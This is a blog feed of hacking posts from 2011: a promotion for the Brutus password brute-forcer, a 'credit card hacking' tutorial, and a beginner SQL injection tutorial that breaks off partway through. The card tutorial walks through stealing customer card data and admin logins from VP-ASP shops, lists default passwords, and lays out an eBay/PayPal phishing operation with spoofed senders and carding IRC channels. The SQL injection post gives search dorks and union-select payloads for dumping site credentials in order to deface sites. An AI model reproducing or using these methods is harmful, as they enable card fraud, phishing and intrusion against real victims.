tag:blogger.com,1999:blog-72645609924587863512024-03-04T23:20:09.415-08:00Software Hacking FacebookDownload Software Hacking Facebook for Freecyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.comBlogger21125tag:blogger.com,1999:blog-7264560992458786351.post-2431093930795439552011-07-16T07:09:00.000-07:002011-07-16T07:09:44.262-07:00Brutus Bruteforcer<strong style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" height="320" src="http://www.madirish.net/assets/images/brutusaction.jpg" width="320" /><br />
<span style="font-size: small;"><br style="color: black;" /></span></strong><span style="color: #00cfff;"><span class="smalltext"><br />
</span><div align="justify" style="color: black;"><span style="font-size: small;"><span>There are dozens of offline passwords crackers for most password-protected resources. Those crackers are designed to find weak passwords and let the administrator know how safe his resources really are.<br />
Brutus is a different kind of password cracker. It works online, trying to break telnet, POP3, FTP, HTTP, RAS or IMAP by simply trying to login as a legitimate users. Brutus imitates a real outside attack (unlike other password cracking applications that simulate an internal attack) and thus serves as a valuable security-auditing tool.<br />
Brutus can run in single user mode (trying to break into a single user's account by trying different password combinations) or by trying a list of user/password combinations from a word file. The application scans the host for known services and can be easily customized to break-in any other custom service requiring interactive logon of a username and a password.<br />
<br />
Using Brutus will teach you a lot about your system, since it simulates a real attack. To make a good use of Brutus's attack simulation an administrator should that note whether the break-in attempts are logged, and whether a timeout is issued after a few failed logins - this can be easily seen by the progress Brutus is making.<br />
<br />
download <a href="http://adf.ly/1hOI0">above</a></span></span></div></span>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com6tag:blogger.com,1999:blog-7264560992458786351.post-89450163379551019662011-07-16T07:07:00.000-07:002011-07-16T07:07:31.608-07:00Tutorial Hacking Credit Card<span style="font-size: small;"><span>Hi Cyberworlds member. This is my first serious "black hat hacking" post of credit cards hacking. Here will be explained all methods used to hack credit cards and bank accounts with lots of $$ it. Now I'm sure most of you think that this is fake or scam, but i want to just tell u this is real and the only working method (in my opinion) to hack a credit card and make your wish come true (lol, hope it doesn't sound like a commercial).</span><br />
<span><span><span></span></span></span></span><br />
<div align="center"><span style="font-size: small;"><span><img alt="" height="239" src="http://cyberworlds.at.ua/images/credit_cards.png" width="305" /><br />
<br />
<br />
</span></span><div align="justify"><span style="font-size: small;">This tutorial is divided in two parts.</span><ol style="font-weight: bold;"><li><span style="font-size: small;">Introduction into Credit Cards</span></li>
<li><span style="font-size: small;">Credit card Hacking</span></li>
</ol><span style="font-size: small;"><br />
<span><span style="font-weight: bold;">Note:</span> <span style="color: red;">Hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.</span></span></span><div align="center"><span style="font-size: small;"><span></span></span></div><span style="font-size: small;"><span>Lets start with some easy terms.<br />
<br />
<span style="font-weight: bold;">What is credit card ?</span><br />
<br />
Credit cards are of two types:</span></span><ul><li><span style="font-size: small;"><span>Debit Card</span></span></li>
<li><span style="font-size: small;"><span>Credit Card</span></span></li>
</ul><span style="font-size: small;"><span>1. Debit means u have a sum of amount in it and u can use them.<br />
2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.<br />
<br />
To use a credit card on internet u just not need cc number and expiry but u need many info like :</span></span><ul><li><span style="font-size: small;"><span>First name</span></span></li>
<li><span style="font-size: small;"><span>Last name</span></span></li>
<li><span style="font-size: small;"><span>Address</span></span></li>
<li><span style="font-size: small;"><span>City</span></span></li>
<li><span style="font-size: small;"><span>State</span></span></li>
<li><span style="font-size: small;"><span>Zip</span></span></li>
<li><span style="font-size: small;"><span>Country</span></span></li>
<li><span style="font-size: small;"><span>Phone</span></span></li>
<li><span style="font-size: small;"><span>CC number</span></span></li>
<li><span style="font-size: small;"><span>Expiry</span></span></li>
<li><span style="font-size: small;"><span>CVV2 ( this is 3digit security code on backside after signature panel )</span></span></li>
</ul><span style="font-size: small;"><span>If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).<br />
<br />
If u want to make money $ through hacking then you need to be very lucky... you need to have a exact bank and bin to cash that credit card through ATM machines.<br />
<br />
Let me explain how ?<br />
<br />
First study some simple terms.<br />
<br />
<span style="font-weight: bold;">BINS</span> = first 6 digit of every credit card is called " BIN " (for example cc number is : 4121638430101157 then its bin is " 412163 "), i hope this is easy to understand.<br />
<br />
Now the question is how to make money through credit cards. Its strange..., well you cant do that, but there is specific persons in world who can do that. They call them selves " cashiers ". You can take some time to find a reliable cashiers.<br />
<br />
Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna .. are all banks are cashables ? Well answer is " NO ". If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.<br />
Every bank don't have ATM, every bank don't support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 - 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.<br />
<br />
Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.<br />
You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower<br />
<br />
Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.<br />
<br />
<span> <span style="font-weight: bold;">Credit Card Hacking</span></span><br />
<br />
CC (Credit Cards) can be hacked by two ways:</span></span><ul><li><span style="font-size: small;"><span><span style="font-weight: bold;">Credit Card Scams</span> ( usually used for earning money , some times for shopping )</span></span></li>
<li><span style="font-size: small;"><span><span style="font-weight: bold;">Credit Card Shopadmin Hacking</span> ( just for fun, knowledge, shopping on internet )</span></span></li>
</ul><span style="font-size: small;"><span>1. <span style="font-weight: bold;">Shopadmin Hacking </span><br />
<br />
This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.<br />
<br />
Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.<br />
<br />
I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.<br />
<br />
Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.<br />
<br />
Lets start:<br />
<br />
Type: VP-ASP Shopping Cart<br />
Version: 5.00<br />
<br />
<span style="font-weight: bold;">How to find VP-ASP 5.00 sites?</span><br />
<br />
Finding VP-ASP 5.00 sites is so simple...<br />
<br />
1. Go to google.com and type: VP-ASP Shopping Cart 5.00<br />
2. You will find many websites with VP-ASP 5.00 cart software installed<br />
<br />
Now let's go to the exploit..<br />
<br />
The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp<br />
The exploit is: diag_dbtest.asp<br />
Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp<br />
<br />
A page will appear contain those:</span></span><ul><li><span style="font-size: small;"><span>xDatabase</span></span></li>
<li><span style="font-size: small;"><span>shopping140</span></span></li>
<li><span style="font-size: small;"><span>xDblocation</span></span></li>
<li><span style="font-size: small;"><span>resx</span></span></li>
<li><span style="font-size: small;"><span>xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r</span></span></li>
</ul><span style="font-size: small;"><span>Example:<br />
<br />
The most important thing here is xDatabase<br />
xDatabase: shopping140<br />
<br />
Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb<br />
<br />
If you didn't download the Database, try this while there is dblocation:<br />
xDblocation<br />
resx<br />
the url will be: ****://***.victim.com/shop/resx/shopping140.mdb<br />
<br />
If u see the error message you have to try this :<br />
****://***.victim.com/shop/shopping500.mdb<br />
<br />
Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at <a href="http://cyberworlds.at.ua/">download.com</a>, or use <a href="http://cyberworlds.at.ua/blog">MS Office Access</a>.<br />
Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.<br />
<br />
The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp<br />
<br />
If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:<br />
Username: admin<br />
password: admin<br />
OR<br />
Username: vpasp<br />
password: vpasp<br />
<br />
<br />
2. <span style="font-weight: bold;">Hacking Through Scams</span><br />
<br />
This method is usually used to hack for earning money. What happens in this method is you create a clone page.<br />
<br />
<span style="font-weight: bold;">Target:</span> its basically eBay.com or paypal.com for general credit cards, or if u want to target any specific cashable bank like regionbank.com then u have to create a clone page for that bank.<br />
<br />
What is eBay.com?<br />
<br />
Its a shopping site world wide which is used by many of billion people which use their credit cards on ebay. What you do make a similar page same as eBay and upload it on some hosting which don't have any law restrictions, try to find hosting in Europe they will make your scam up for long time, and email the users of eBay.<br />
<br />
How to get the emails of their users?<br />
<br />
Go to google.com and type "Email Harvestor" or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. Atleast you will get some time.<br />
<br />
Well u create a clone page of ebay, and mail the list u create from spider with message, like "Your account has been hacked" or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.<br />
In the form page u have PIN required so u also get the PIN number through which u can cash through ATM ..<br />
<br />
Now if u run ebay scam or paypal scam, its up to your luck who's your victim. A client of bank of america or of citibank or of region, its about luck, maybe u get cashable, may be u don't its just luck, nothing else.<br />
<br />
Search on google to download a scam site and study it !<br />
<br />
After you create your scam site, just find some email harvestor or spider from internet (download good one at Bulk Email Software Superstore - Email Marketing Internet Advertising) and create a good email list.<br />
<br />
And you need to find a mailer (mass sending mailer) which send mass - emails to all emails with the message of updating their account on ur scam page ). In from to, use email <span style="font-weight: bold;">eBay@reply3.ebay.com</span> and in subject use : <span style="font-weight: bold;">eBay - Update Your eBay Account</span> and in Name use <span style="font-weight: bold;">eBay</span><br />
<br />
Some Instructions:<br />
<br />
1. Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.<br />
2. Hardest point is to find hosting which remains up in scam. even i don't find it easily, its very very hard part.<br />
3. Maybe u have contacts with someone who own hosting company and co locations or dedicated he can hide your scam in some of dedicated without restrictions.<br />
4. Finding a good email list (good means = actually users)<br />
5. Your mass mailing software land the emails in inbox of users.<br />
<br />
<br />
That's all folks. Hope you will find this tutorial useful. <span style="color: red; font-weight: bold;">And remember, hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial.</span> <br />
<br />
Do you have questions, comments, or suggestions? Feel free to post a comment! </span></span></div></div>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com9tag:blogger.com,1999:blog-7264560992458786351.post-37860873179745889422011-07-16T07:05:00.000-07:002011-07-16T07:05:23.957-07:00SQL Injection Tutorial! 100% NOOB FRIENDLY!!<span style="font-size: small;"><span><span><span style="color: red;">SQL Injection</span></span><br />
<span><span style="color: red;"> </span></span><br />
Hi, this thread covers all your basic SQL Injection needs. After reading this, you should be able to successfully retrieve Database information such as the username and password that are crucial for defacing sites.<br />
<br />
Bookmark this for future reference if you want.</span><span><br />
<br />
Lets start. </span></span> <br />
<div style="text-align: justify;"><span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> </span></span></div><span style="font-size: small;"><span><span style="color: red;"><span>What is SQL Injection?</span></span><br />
<br />
is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.</span><span><br />
<br />
<a href="http://en.wikipedia.org/wiki/SQL_injection" target="_blank">Source</a></span><span><br />
</span></span> <br />
<div style="text-align: justify;"><span style="font-size: small;"><span><span><span style="color: red;">Step 1: Choose Your Target</span></span> </span></span><br />
<span style="font-size: small;"><span></span></span><br />
<span style="font-size: small;"><span> Of course, you can't SQL Inject nothing. You must have a website as a target. Remember, only vulnerabl sites are able to be injected into. You can't just SQL Inject any site *sigh*.</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> So how do we see which sites are vulnerable? There are many lists of vulnerable sites out there. But if you wish to find them manually, read on.</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> Dorks </span></span><br />
<span style="font-size: small;"><span> inurl:index.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:trainers.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:buy.php?category=</span></span><br />
<span style="font-size: small;"><span> inurl:article.php?ID=</span></span><br />
<span style="font-size: small;"><span> inurl:play_old.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:declaration_more.php?decl_id=</span></span><br />
<span style="font-size: small;"><span> inurl:pageid=</span></span><br />
<span style="font-size: small;"><span> inurl:games.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:page.php?file=</span></span><br />
<span style="font-size: small;"><span> inurl:newsDetail.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:gallery.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:article.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:show.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:staff_id=</span></span><br />
<span style="font-size: small;"><span> inurl:newsitem.php?num=</span></span><br />
<span style="font-size: small;"><span> inurl:readnews.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:top10.php?cat=</span></span><br />
<span style="font-size: small;"><span> inurl:historialeer.php?num=</span></span><br />
<span style="font-size: small;"><span> inurl:reagir.php?num=</span></span><br />
<span style="font-size: small;"><span> inurl:Stray-Questions-View.php?num=</span></span><br />
<span style="font-size: small;"><span> inurl:forum_bds.php?num=</span></span><br />
<span style="font-size: small;"><span> inurl:game.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:view_product.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:newsone.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:sw_comment.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:news.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:avd_start.php?avd=</span></span><br />
<span style="font-size: small;"><span> inurl:event.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:product-item.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:sql.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:news_view.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:select_biblio.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:humor.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:aboutbook.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:ogl_inet.php?ogl_id=</span></span><br />
<span style="font-size: small;"><span> inurl:fiche_spectacle.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:communique_detail.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:sem.php3?id=</span></span><br />
<span style="font-size: small;"><span> inurl:kategorie.php4?id=</span></span><br />
<span style="font-size: small;"><span> inurl:news.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:index.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:faq2.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:show_an.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:preview.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:loadpsb.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:opinions.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:spr.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:pages.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:announce.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:clanek.php4?id=</span></span><br />
<span style="font-size: small;"><span> inurl:participant.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:download.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:main.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:review.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:chappies.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:read.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:prod_detail.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:viewphoto.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:article.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:person.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:productinfo.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:showimg.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:view.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:website.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:hosting_info.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:gallery.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:rub.php?idr=</span></span><br />
<span style="font-size: small;"><span> inurl:view_faq.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:artikelinfo.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:detail.php?ID=</span></span><br />
<span style="font-size: small;"><span> inurl:index.php?=</span></span><br />
<span style="font-size: small;"><span> inurl:profile_view.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:category.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:publications.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:fellows.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:downloads_info.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:prod_info.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:shop.php?do=part&id=</span></span><br />
<span style="font-size: small;"><span> inurl:productinfo.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:collectionitem.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:band_info.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:product.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:releases.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:ray.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:produit.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:pop.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:shopping.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:productdetail.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:post.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:viewshowdetail.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:clubpage.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:memberInfo.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:section.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:theme.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:page.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:shredder-categories.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:tradeCategory.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:product_ranges_view.php?ID=</span></span><br />
<span style="font-size: small;"><span> inurl:shop_category.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:transcript.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:channel_id=</span></span><br />
<span style="font-size: small;"><span> inurl:item_id=</span></span><br />
<span style="font-size: small;"><span> inurl:newsid=</span></span><br />
<span style="font-size: small;"><span> inurl:trainers.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:news-full.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:news_display.php?getid=</span></span><br />
<span style="font-size: small;"><span> inurl:index2.php?option=</span></span><br />
<span style="font-size: small;"><span> inurl:readnews.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:top10.php?cat=</span></span><br />
<span style="font-size: small;"><span> inurl:newsone.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:event.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:product-item.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:sql.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:aboutbook.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:preview.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:loadpsb.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:pages.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:material.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:clanek.php4?id=</span></span><br />
<span style="font-size: small;"><span> inurl:announce.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:chappies.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:read.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:viewapp.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:viewphoto.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:rub.php?idr=</span></span><br />
<span style="font-size: small;"><span> inurl:galeri_info.php?l=</span></span><br />
<span style="font-size: small;"><span> inurl:review.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:iniziativa.php?in=</span></span><br />
<span style="font-size: small;"><span> inurl:curriculum.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:labels.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:story.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:look.php?ID=</span></span><br />
<span style="font-size: small;"><span> inurl:newsone.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:aboutbook.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:material.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:opinions.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:announce.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:rub.php?idr=</span></span><br />
<span style="font-size: small;"><span> inurl:galeri_info.php?l=</span></span><br />
<span style="font-size: small;"><span> inurl:tekst.php?idt=</span></span><br />
<span style="font-size: small;"><span> inurl:newscat.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:newsticker_info.php?idn=</span></span><br />
<span style="font-size: small;"><span> inurl:rubrika.php?idr=</span></span><br />
<span style="font-size: small;"><span> inurl:rubp.php?idr=</span></span><br />
<span style="font-size: small;"><span> inurl:offer.php?idf=</span></span><br />
<span style="font-size: small;"><span> inurl:art.php?idm=</span></span><br />
<span style="font-size: small;"><span> inurl:title.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:recruit_details.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:index.php?cPath=</span></span><br />
<span style="font-size: small;"><span> inurl:customer_testimonials.php?testimonial_id=</span></span><br />
<span style="font-size: small;"><span> inurl:.php?rsnType=1&id=</span></span><br />
<span style="font-size: small;"><span> inurl:support.php?id=</span></span><br />
<span style="font-size: small;"><span> inurl:gallery_view.php?id=</span></span><br />
<span style="font-size: small;"><span> Wtf is this? These are "Dorks" that you can use to find vulnerable sites. Go to Google and simply copy and paste one of those dorks and click search.</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> I personally recommend going <a href="http://adf.ly/20MEn" target="_blank">here</a> (scanner seems to be down) to see which sites are vulnerable, but if you wish to do THAT manually also, read on. If not, skip to Step 2.</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> After you have Googled the dorks, click on any site.</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> To check the site for vulnerability, simply add a "'" to the end of the URL (without the quotes). It should look somewhat like this:</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> <code>http://www.sitename.com/main.php?id=232'</code> </span></span><br />
<span style="font-size: small;"><span> If the page simply refreshes, the site is not vulnerable. But if an error of any kind pops up, the site is prone to SQLi. When you have successfully found a vulnerable site, proceed to Step 2.</span></span><br />
<span style="font-size: small;"><span></span></span><br />
<span style="font-size: small;"><span></span></span> </div><div align="justify"> </div><span style="font-size: small;"><span><span style="color: red;"><span>Step 2: Find the Vulnerable Column</span></span> </span></span><br />
<span style="font-size: small;"><span></span></span><br />
<span style="font-size: small;"><span> Now that we found our vulnerable site, we will need to find the vulnerable columns.</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> Add this to the end of the URL:</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> <code>http://www.sitename.com/main.php?id=232 order by 1--</code> </span></span><br />
<span style="font-size: small;"><span> Now here's where it gets tougher (not really). You have to look for errors as you enter new numbers. For example:</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> <code>http://www.sitename.com/main.php?id=232 order by 1-- (no error)</code></span></span><br />
<span style="font-size: small;"><span><code> http://www.sitename.com/main.php?id=232 order by 2-- (no error)</code></span></span><br />
<span style="font-size: small;"><span><code> http://www.sitename.com/main.php?id=232 order by 10-- (ERROR!)</code></span></span><br />
<span style="font-size: small;"><span><code> http://www.sitename.com/main.php?id=232 order by 5-- (no error)</code></span></span><br />
<span style="font-size: small;"><span><code> http://www.sitename.com/main.php?id=232 order by 6-- (ERROR!)</code> </span></span><br />
<span style="font-size: small;"><span> The goal here is to find the least column the shows the error. As you can see in the example, the lowest column that we found an error on is column 6, therefore, column 6 doesn't exist and there are only 5 columns.</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> Now we have to find which one of these five columns (it may be different in your case) is vulnerable, to do that, add this code to the end of the URL:</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> <code>http://www.sitename.com/main.php?id=-232 union select 1,2,3,4,5--</code> </span></span><br />
<span style="font-size: small;"><span> Make sure to include the - in the beginning and the -- at the end, this is crucial. Remember that the code above may be different in your case regarding how many columns there are.</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> Now, if you see numbers on the screen. You can proceed. The very first number is the number of the vulnerable column. If the number is "4" that means that the 4th column is the vulnerable column.</span></span><br />
<span style="font-size: small;"><span></span></span><br />
<span style="font-size: small;"><span></span></span> <div align="justify"> </div><span style="font-size: small;"><span><span style="color: red;"><span>Step 3: Obtain Version Number and Database Name</span></span> </span></span><br />
<span style="font-size: small;"><span></span></span><br />
<span style="font-size: small;"><span> That vulnerable column is the ONLY column that we will be editing.</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> Assuming that the vulnerable column is 4 (it may be different in your case), proceed to find the version number. To find the version number, replace the vulnerable column with "@@version" like this:</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> <code>http://www.sitename.com/main.php?id=-232 union select 1,2,3,@@version,5--</code> </span></span><br />
<span style="font-size: small;"><span> If the version is 5 or above, proceed. If not, it will be harder to hack. There are other tutorials covering how to hack database versions 4 or lower.</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> Now we must find the database name. To do this, replace the "@@version" from before with "concat(database())" like this:</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> <code>http://www.sitename.com/main.php?id=-232 union select 1,2,3,concat(database()),5--</code> </span></span><br />
<span style="font-size: small;"><span> And BOOM! The database name should appear on your screen. Copy this somewhere safe, we will need this for later.</span></span> <div align="justify"> </div><span style="font-size: small;"><span><span style="color: red;"><span></span></span></span></span><br />
<span style="font-size: small;"><span><span style="color: red;"><span>Step 4: Obtain Table Names</span></span> </span></span><br />
<span style="font-size: small;"><span></span></span><br />
<span style="font-size: small;"><span> We are almost done, don't give up just yet.</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> Now we have to find the table names. This is crucial because the tables contain all of the information that we may need. Some hackers look for credit card information and e-mail adresses, but in this tutorial we will be looking to retrieve the username and password in order to deface the site.</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> Edit the code as follows:</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> <code>http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema=database()--</code> </span></span><br />
<span style="font-size: small;"><span> Now, names appear. Look for obvious names hinting to tables where user information can be stored. You are looking for table names such as "Admin", "Users", "Members", "Admin_Id", Admin_pass", "User_id", etc..</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> The last character is chopped off? Don't worry. Count how many tables you can see, then add this code based on the tables that you can see. We will be assuming that the last table you can see is the 8th table.</span></span><br />
<span style="font-size: small;"><span> </span></span><br />
<span style="font-size: small;"><span> </span></span><br />
